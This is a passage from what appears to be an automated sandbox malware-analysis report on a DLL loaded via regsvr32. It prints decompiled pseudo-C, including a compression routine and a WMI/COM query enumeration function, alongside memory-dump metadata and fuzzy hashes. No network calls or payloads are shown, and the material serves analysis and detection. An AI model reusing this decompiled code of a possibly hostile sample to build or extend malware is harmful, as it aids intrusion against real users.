        					_t35 = _t35 + 1;
        					if(_t35 < 2) {
        						continue;
        					}
        					L5:
        					return 0;
        				}
        				_t21 =  *0x1001e684; // 0x219faa0
        				_t22 =  *((intOrPtr*)(_t21 + 0x98))(_t28, _t20);
        				_t30 =  *0x1001e684; // 0x219faa0
        				_t37 = _t22;
        				_t23 =  *((intOrPtr*)(_t30 + 0x9c))(_t28, _v12);
        				__eflags = _t23;
        				if(_t23 != 0) {
        					_t33 = E10008669(_t23, _t37);
        					__eflags = _t33;
        					if(_t33 == 0) {
        						goto L5;
        					}
        					_t26 = _a4;
        					__eflags = _t26;
        					if(_t26 != 0) {
        						 *_t26 = _t37;
        					}
        					return _t33;
        				}
        				goto L5;
        			}























        APIs
          • Part of subcall function 1001242D: _ftol2_sse.MSVCRT ref: 1001248E
        • FindResourceA.KERNEL32(?,?,0000000A), ref: 1000A56B
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: FindResource_ftol2_sse
        • String ID:
        • API String ID: 726351646-0
        • Opcode ID: fa11afd7f41ea2378334fb299b75509f8c3df56b18904dd99f39985f38db9f94
        • Instruction ID: 3c93fbf5725d9a1cffb7147d36ac05838d176544f789f1d2bd1208ee8d1f8f1b
        • Opcode Fuzzy Hash: fa11afd7f41ea2378334fb299b75509f8c3df56b18904dd99f39985f38db9f94
        • Instruction Fuzzy Hash: 3D119D71B00305AFFB04CB69EC85E5E7BE9FB55395F014168F909D7252EA71DD408B50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
        				signed int _v8;
        				signed short* _v12;
        				char _v16;
        				signed short _v20;
        				unsigned int _v24;
        				signed short _v28;
        				signed int _t223;
        				signed int _t235;
        				signed int _t237;
        				signed short _t240;
        				signed int _t241;
        				signed short _t244;
        				signed int _t245;
        				signed short _t248;
        				signed int _t249;
        				signed int _t250;
        				void* _t254;
        				signed char _t259;
        				signed int _t275;
        				signed int _t289;
        				signed int _t308;
        				signed short _t316;
        				signed int _t321;
        				void* _t329;
        				signed short _t330;
        				signed short _t333;
        				signed short _t334;
        				signed short _t343;
        				signed short _t346;
        				signed short _t347;
        				signed short _t348;
        				signed short _t358;
        				signed short _t361;
        				signed short _t362;
        				signed short _t363;
        				signed short _t370;
        				signed int _t373;
        				signed int _t378;
        				signed short _t379;
        				signed short _t382;
        				unsigned int _t388;
        				unsigned short _t390;
        				unsigned short _t392;
        				unsigned short _t394;
        				signed int _t396;
        				signed int _t397;
        				signed int _t398;
        				signed int _t400;
        				signed short _t401;
        				signed int _t402;
        				signed int _t403;
        				signed int _t407;
        				signed int _t409;
        
        				_t223 = _a8;
        				_t235 =  *(_t223 + 2) & 0x0000ffff;
        				_push(_t397);
        				_t388 = 0;
        				_t398 = _t397 | 0xffffffff;
        				if(_a12 < 0) {
        					L42:
        					return _t223;
        				} else {
        					_t329 =  !=  ? 7 : 0x8a;
        					_v12 = _t223 + 6;
        					_t254 = (0 | _t235 != 0x00000000) + 3;
        					_v16 = _a12 + 1;
        					do {
        						_v24 = _t388;
        						_t388 = _t388 + 1;
        						_a8 = _t235;
        						_a12 = _t235;
        						_v8 =  *_v12 & 0x0000ffff;
        						_t223 = _a4;
        						if(_t388 >= _t329) {
        							L4:
        							if(_t388 >= _t254) {
        								if(_a8 == 0) {
        									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
        									_t400 =  *_t122;
        									if(_t388 > 0xa) {
        										_t168 = _t223 + 0xac4; // 0x5dc03300
        										_t330 =  *_t168 & 0x0000ffff;
        										_t169 = _t223 + 0xac6; // 0x55c35dc0
        										_t237 =  *_t169 & 0x0000ffff;
        										_v24 = _t330;
        										_t171 = _t223 + 0x16b8; // 0xfffffe8b
        										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
        										_v28 = _t333;
        										if(_t400 <= 0x10 - _t237) {
        											_t259 = _t400 + _t237;
        										} else {
        											_t173 = _t223 + 0x14; // 0xc703f045
        											 *(_t223 + 0x16b8) = _t333;
        											_t175 = _t223 + 8; // 0x8d000040
        											 *((char*)( *_t175 +  *_t173)) = _v28;
        											_t223 = _a4;
        											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        											_t181 = _t223 + 0x14; // 0xc703f045
        											_t182 = _t223 + 8; // 0x8d000040
        											_t183 = _t223 + 0x16b9; // 0x89fffffe
        											 *((char*)( *_t181 +  *_t182)) =  *_t183;
        											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        											_t333 = _v24 >> 0x10;
        											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
        											_t259 =  *_t189 + 0xfffffff0 + _t237;
        										}
        										_t334 = _t333 & 0x0000ffff;
        										 *(_t223 + 0x16bc) = _t259;
        										 *(_t223 + 0x16b8) = _t334;
        										_t401 = _t334 & 0x0000ffff;
        										if(_t259 <= 9) {
        											_t209 = _t388 - 0xb; // -10
        											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
        											 *(_t223 + 0x16bc) = _t259 + 7;
        										} else {
        											_t193 = _t223 + 8; // 0x8d000040
        											_t390 = _t388 + 0xfffffff5;
        											_t194 = _t223 + 0x14; // 0xc703f045
        											_t240 = _t390 << _t259 | _t401;
        											 *(_t223 + 0x16b8) = _t240;
        											 *( *_t193 +  *_t194) = _t240;
        											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        											_t199 = _t223 + 0x14; // 0xc703f045
        											_t200 = _t223 + 8; // 0x8d000040
        											_t201 = _t223 + 0x16b9; // 0x89fffffe
        											 *((char*)( *_t199 +  *_t200)) =  *_t201;
        											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
        											 *(_t223 + 0x16b8) = _t390 >> 0x10;
        										}
        										goto L35;
        									}
        									_t123 = _t223 + 0xac0; // 0x4e9
        									_t343 =  *_t123 & 0x0000ffff;
        									_t124 = _t223 + 0xac2; // 0x33000000
        									_t241 =  *_t124 & 0x0000ffff;
        									_v24 = _t343;
        									_t126 = _t223 + 0x16b8; // 0xfffffe8b
        									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
        									_v28 = _t346;
        									if(_t400 > 0x10 - _t241) {
        										_t128 = _t223 + 0x14; // 0xc703f045
        										 *(_t223 + 0x16b8) = _t346;
        										_t130 = _t223 + 8; // 0x8d000040
        										 *((char*)( *_t130 +  *_t128)) = _v28;
        										_t223 = _a4;
        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        										_t136 = _t223 + 0x14; // 0xc703f045
        										_t137 = _t223 + 8; // 0x8d000040
        										_t138 = _t223 + 0x16b9; // 0x89fffffe
        										 *((char*)( *_t136 +  *_t137)) =  *_t138;
        										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        										_t346 = _v24 >> 0x10;
        										_t400 =  *_t142 + 0xfffffff0;
        									}
        									_t403 = _t400 + _t241;
        									_t347 = _t346 & 0x0000ffff;
        									 *(_t223 + 0x16bc) = _t403;
        									 *(_t223 + 0x16b8) = _t347;
        									_t348 = _t347 & 0x0000ffff;
        									if(_t403 <= 0xd) {
        										_t163 = _t403 + 3; // 0x8b3c7e8c
        										_t275 = _t163;
        										L28:
        										 *(_t223 + 0x16bc) = _t275;
        										_t165 = _t388 - 3; // -2
        										_t166 = _t223 + 0x16b8; // 0xfffffe8b
        										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
        									} else {
        										_t392 = _t388 + 0xfffffffd;
        										_t147 = _t223 + 0x14; // 0xc703f045
        										_t244 = _t392 << _t403 | _t348;
        										_t148 = _t223 + 8; // 0x8d000040
        										 *(_t223 + 0x16b8) = _t244;
        										 *( *_t148 +  *_t147) = _t244;
        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        										_t153 = _t223 + 0x14; // 0xc703f045
        										_t154 = _t223 + 8; // 0x8d000040
        										_t155 = _t223 + 0x16b9; // 0x89fffffe
        										 *((char*)( *_t153 +  *_t154)) =  *_t155;
        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
        										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
        									}
        									goto L35;
        								}
        								_t289 = _a12;
        								if(_t289 != _t398) {
        									_t53 = _t289 * 4; // 0x238830a
        									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
        									_t56 = _t235 * 4; // 0x830a74c0
        									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
        									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
        									_t407 =  *_t58;
        									_v28 = _t370;
        									_t60 = _t223 + 0x16b8; // 0xfffffe8b
        									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
        									if(_t407 <= 0x10 - _t396) {
        										_t373 = _t249;
        										_t308 = _t407 + _t396;
        									} else {
        										_t61 = _t223 + 0x14; // 0xc703f045
        										_t62 = _t223 + 8; // 0x8d000040
        										 *(_t223 + 0x16b8) = _t249;
        										 *( *_t62 +  *_t61) = _t249;
        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        										_t67 = _t223 + 0x14; // 0xc703f045
        										_t68 = _t223 + 8; // 0x8d000040
        										_t69 = _t223 + 0x16b9; // 0x89fffffe
        										 *((char*)( *_t67 +  *_t68)) =  *_t69;
        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
        										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
        										_t308 =  *_t75 + 0xfffffff0 + _t396;
        									}
        									_t388 = _v24;
        									 *(_t223 + 0x16bc) = _t308;
        									 *(_t223 + 0x16b8) = _t373;
        								}
        								_t80 = _t223 + 0xabc; // 0x5d0674c0
        								_t358 =  *_t80 & 0x0000ffff;
        								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
        								_t402 =  *_t81;
        								_t82 = _t223 + 0xabe; // 0x4e95d06
        								_t245 =  *_t82 & 0x0000ffff;
        								_v24 = _t358;
        								_t84 = _t223 + 0x16b8; // 0xfffffe8b
        								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
        								_v28 = _t361;
        								if(_t402 > 0x10 - _t245) {
        									_t86 = _t223 + 0x14; // 0xc703f045
        									 *(_t223 + 0x16b8) = _t361;
        									_t88 = _t223 + 8; // 0x8d000040
        									 *((char*)( *_t88 +  *_t86)) = _v28;
        									_t223 = _a4;
        									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        									_t94 = _t223 + 0x14; // 0xc703f045
        									_t95 = _t223 + 8; // 0x8d000040
        									_t96 = _t223 + 0x16b9; // 0x89fffffe
        									 *((char*)( *_t94 +  *_t95)) =  *_t96;
        									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
        									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        									_t361 = _v24 >> 0x10;
        									_t402 =  *_t100 + 0xfffffff0;
        								}
        								_t403 = _t402 + _t245;
        								_t362 = _t361 & 0x0000ffff;
        								 *(_t223 + 0x16bc) = _t403;
        								 *(_t223 + 0x16b8) = _t362;
        								_t363 = _t362 & 0x0000ffff;
        								if(_t403 <= 0xe) {
        									_t121 = _t403 + 2; // 0x8b3c7e8b
        									_t275 = _t121;
        									goto L28;
        								} else {
        									_t394 = _t388 + 0xfffffffd;
        									_t105 = _t223 + 0x14; // 0xc703f045
        									_t248 = _t394 << _t403 | _t363;
        									_t106 = _t223 + 8; // 0x8d000040
        									 *(_t223 + 0x16b8) = _t248;
        									 *( *_t106 +  *_t105) = _t248;
        									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        									_t111 = _t223 + 0x14; // 0xc703f045
        									_t112 = _t223 + 8; // 0x8d000040
        									_t113 = _t223 + 0x16b9; // 0x89fffffe
        									 *((char*)( *_t111 +  *_t112)) =  *_t113;
        									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
        									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
        									goto L35;
        								}
        							} else {
        								_t316 = _t223 + (_t235 + 0x29f) * 4;
        								_v28 = _t316;
        								do {
        									_t378 = _a12;
        									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
        									_t409 =  *_t22;
        									_t24 = _t378 * 4; // 0x238830a
        									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
        									_t379 =  *_t316 & 0x0000ffff;
        									_v24 = _t379;
        									_t27 = _t223 + 0x16b8; // 0xfffffe8b
        									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
        									_v20 = _t382;
        									if(_t409 <= 0x10 - _t250) {
        										_t321 = _t409 + _t250;
        									} else {
        										_t29 = _t223 + 0x14; // 0xc703f045
        										 *(_t223 + 0x16b8) = _t382;
        										_t31 = _t223 + 8; // 0x8d000040
        										 *((char*)( *_t31 +  *_t29)) = _v20;
        										_t223 = _a4;
        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        										_t37 = _t223 + 0x14; // 0xc703f045
        										_t38 = _t223 + 8; // 0x8d000040
        										_t39 = _t223 + 0x16b9; // 0x89fffffe
        										 *((char*)( *_t37 +  *_t38)) =  *_t39;
        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
        										_t382 = _v24 >> 0x10;
        										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
        										_t321 =  *_t45 + 0xfffffff0 + _t250;
        									}
        									 *(_t223 + 0x16bc) = _t321;
        									_t316 = _v28;
        									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
        									_t388 = _t388 - 1;
        								} while (_t388 != 0);
        								L35:
        								_t235 = _v8;
        								_t388 = 0;
        								_t398 = _a12;
        								if(_t235 != 0) {
        									if(_a8 != _t235) {
        										_t329 = 7;
        										_t217 = _t329 - 3; // 0x4
        										_t254 = _t217;
        									} else {
        										_t329 = 6;
        										_t216 = _t329 - 3; // 0x3
        										_t254 = _t216;
        									}
        								} else {
        									_t329 = 0x8a;
        									_t214 = _t388 + 3; // 0x3
        									_t254 = _t214;
        								}
        								goto L41;
        							}
        						}
        						_t223 = _a4;
        						if(_t235 == _v8) {
        							_t235 = _v8;
        							goto L41;
        						}
        						goto L4;
        						L41:
        						_v12 =  &(_v12[2]);
        						_t221 =  &_v16;
        						 *_t221 = _v16 - 1;
        					} while ( *_t221 != 0);
        					goto L42;
        				}
        			}

























































        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
        • Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
        • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
        • Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
        • Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
        • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
        • Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
        • Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
        • Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
        • Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000004.00000002.516721400.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10077000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
        • Instruction ID: a747058df7fb53957c711544c71ce12918e7169a6b47a17de73b7eef07d7616c
        • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
        • Instruction Fuzzy Hash: E31196733401009FD754CE55DC91EA677EAFB992707258065ED48CB316D779EC41C760
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
        • Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
        • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
        • Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000004.00000002.516721400.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10077000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
        • Instruction ID: 784e0acdb4fcdcc5ceb578c6db7b19a6e3175e33625eb0579154fecf24664306
        • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
        • Instruction Fuzzy Hash: 390126333842418FD789CF28D888D6DB7E4FBC12A4B16C0BEC58A83615D938E845CA36
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				void* _v28;
        				signed int _v32;
        				char _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				char _v48;
        				char _v52;
        				intOrPtr _v56;
        				signed int _v60;
        				char* _v72;
        				signed short _v80;
        				signed int _v84;
        				char _v88;
        				char _v92;
        				char _v96;
        				intOrPtr _v100;
        				char _v104;
        				char _v616;
        				intOrPtr* _t159;
        				char _t165;
        				signed int _t166;
        				signed int _t173;
        				signed int _t178;
        				signed int _t186;
        				intOrPtr* _t187;
        				signed int _t188;
        				signed int _t192;
        				intOrPtr* _t193;
        				intOrPtr _t200;
        				intOrPtr* _t205;
        				signed int _t207;
        				signed int _t209;
        				intOrPtr* _t210;
        				intOrPtr _t212;
        				intOrPtr* _t213;
        				signed int _t214;
        				char _t217;
        				signed int _t218;
        				signed int _t219;
        				signed int _t230;
        				signed int _t235;
        				signed int _t242;
        				signed int _t243;
        				signed int _t244;
        				signed int _t245;
        				intOrPtr* _t247;
        				intOrPtr* _t251;
        				signed int _t252;
        				intOrPtr* _t253;
        				void* _t255;
        				intOrPtr* _t261;
        				signed int _t262;
        				signed int _t283;
        				signed int _t289;
        				char* _t298;
        				void* _t320;
        				signed int _t322;
        				intOrPtr* _t323;
        				intOrPtr _t324;
        				signed int _t327;
        				intOrPtr* _t328;
        				intOrPtr* _t329;
        
        				_v32 = _v32 & 0x00000000;
        				_v60 = _v60 & 0x00000000;
        				_v56 = __edx;
        				_v100 = __ecx;
        				_t159 = E1000D523(__ecx);
        				_t251 = _t159;
        				_v104 = _t251;
        				if(_t251 == 0) {
        					return _t159;
        				}
        				_t320 = E10008604(0x10);
        				_v36 = _t320;
        				_pop(_t255);
        				if(_t320 == 0) {
        					L53:
        					E1000861A( &_v60, 0xfffffffe);
        					E1000D5D7( &_v104);
        					return _t320;
        				}
        				_t165 = E100095E1(_t255, 0x536);
        				 *_t328 = 0x609;
        				_v52 = _t165;
        				_t166 = E100095E1(_t255);
        				_push(0);
        				_push(_v56);
        				_v20 = _t166;
        				_push(_t166);
        				_push(_a4);
        				_t322 = E100092E5(_t165);
        				_v60 = _t322;
        				E100085D5( &_v52);
        				E100085D5( &_v20);
        				_t329 = _t328 + 0x20;
        				if(_t322 != 0) {
        					_t323 = __imp__#2;
        					_v40 =  *_t323(_t322);
        					_t173 = E100095E1(_t255, 0x9e4);
        					_v20 = _t173;
        					_v52 =  *_t323(_t173);
        					E100085D5( &_v20);
        					_t324 = _v40;
        					_t261 =  *_t251;
        					_t252 = 0;
        					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
        					__eflags = _t178;
        					if(_t178 != 0) {
        						L52:
        						__imp__#6(_t324);
        						__imp__#6(_v52);
        						goto L53;
        					}
        					_t262 = _v32;
        					_v28 = 0;
        					_v20 = 0;
        					__eflags = _t262;
        					if(_t262 == 0) {
        						L49:
        						 *((intOrPtr*)( *_t262 + 8))(_t262);
        						__eflags = _t252;
        						if(_t252 == 0) {
        							E1000861A( &_v36, 0);
        							_t320 = _v36;
        						} else {
        							 *(_t320 + 8) = _t252;
        							 *_t320 = E100091E3(_v100);
        							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
        						}
        						goto L52;
        					} else {
        						goto L6;
        					}
        					while(1) {
        						L6:
        						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
        						__eflags = _t186;
        						if(_t186 != 0) {
        							break;
        						}
        						_v16 = 0;
        						_v48 = 0;
        						_v12 = 0;
        						_v24 = 0;
        						__eflags = _v84;
        						if(_v84 == 0) {
        							break;
        						}
        						_t187 = _v28;
        						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
        						__eflags = _t188;
        						if(_t188 >= 0) {
        							__imp__#20(_v24, 1,  &_v16);
        							__imp__#19(_v24, 1,  &_v48);
        							_t46 = _t320 + 0xc; // 0xc
        							_t253 = _t46;
        							_t327 = _t252 << 3;
        							_t47 = _t327 + 8; // 0x8
        							_t192 = E10008698(_t327, _t47);
        							__eflags = _t192;
        							if(_t192 == 0) {
        								__imp__#16(_v24);
        								_t193 = _v28;
        								 *((intOrPtr*)( *_t193 + 8))(_t193);
        								L46:
        								_t252 = _v20;
        								break;
        							}
        							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
        							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
        							_t200 =  *_t253;
        							__eflags =  *(_t327 + _t200 + 4);
        							if( *(_t327 + _t200 + 4) == 0) {
        								_t136 = _t320 + 0xc; // 0xc
        								E1000861A(_t136, 0);
        								E1000861A( &_v36, 0);
        								__imp__#16(_v24);
        								_t205 = _v28;
        								 *((intOrPtr*)( *_t205 + 8))(_t205);
        								_t320 = _v36;
        								goto L46;
        							}
        							_t207 = _v16;
        							while(1) {
        								_v12 = _t207;
        								__eflags = _t207 - _v48;
        								if(_t207 > _v48) {
        									break;
        								}
        								_v44 = _v44 & 0x00000000;
        								_t209 =  &_v12;
        								__imp__#25(_v24, _t209,  &_v44);
        								__eflags = _t209;
        								if(_t209 < 0) {
        									break;
        								}
        								_t212 = E100091E3(_v44);
        								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
        								_t213 = _v28;
        								_t281 =  *_t213;
        								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
        								__eflags = _t214;
        								if(_t214 < 0) {
        									L39:
        									__imp__#6(_v44);
        									_t207 = _v12 + 1;
        									__eflags = _t207;
        									continue;
        								}
        								_v92 = E100095E1(_t281, 0x250);
        								 *_t329 = 0x4cc;
        								_t217 = E100095E1(_t281);
        								_t283 = _v80;
        								_v96 = _t217;
        								_t218 = _t283 & 0x0000ffff;
        								__eflags = _t218 - 0xb;
        								if(__eflags > 0) {
        									_t219 = _t218 - 0x10;
        									__eflags = _t219;
        									if(_t219 == 0) {
        										L35:
        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
        										__eflags = _t289;
        										if(_t289 == 0) {
        											L38:
        											E100085D5( &_v92);
        											E100085D5( &_v96);
        											__imp__#9( &_v80);
        											goto L39;
        										}
        										_push(_v72);
        										_push(L"%d");
        										L37:
        										_push(0xc);
        										_push(_t289);
        										E10009640();
        										_t329 = _t329 + 0x10;
        										goto L38;
        									}
        									_t230 = _t219 - 1;
        									__eflags = _t230;
        									if(_t230 == 0) {
        										L33:
        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
        										__eflags = _t289;
        										if(_t289 == 0) {
        											goto L38;
        										}
        										_push(_v72);
        										_push(L"%u");
        										goto L37;
        									}
        									_t235 = _t230 - 1;
        									__eflags = _t235;
        									if(_t235 == 0) {
        										goto L33;
        									}
        									__eflags = _t235 == 1;
        									if(_t235 == 1) {
        										goto L33;
        									}
        									L28:
        									__eflags = _t283 & 0x00002000;
        									if((_t283 & 0x00002000) == 0) {
        										_v88 = E100095E1(_t283, 0x219);
        										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
        										E100085D5( &_v88);
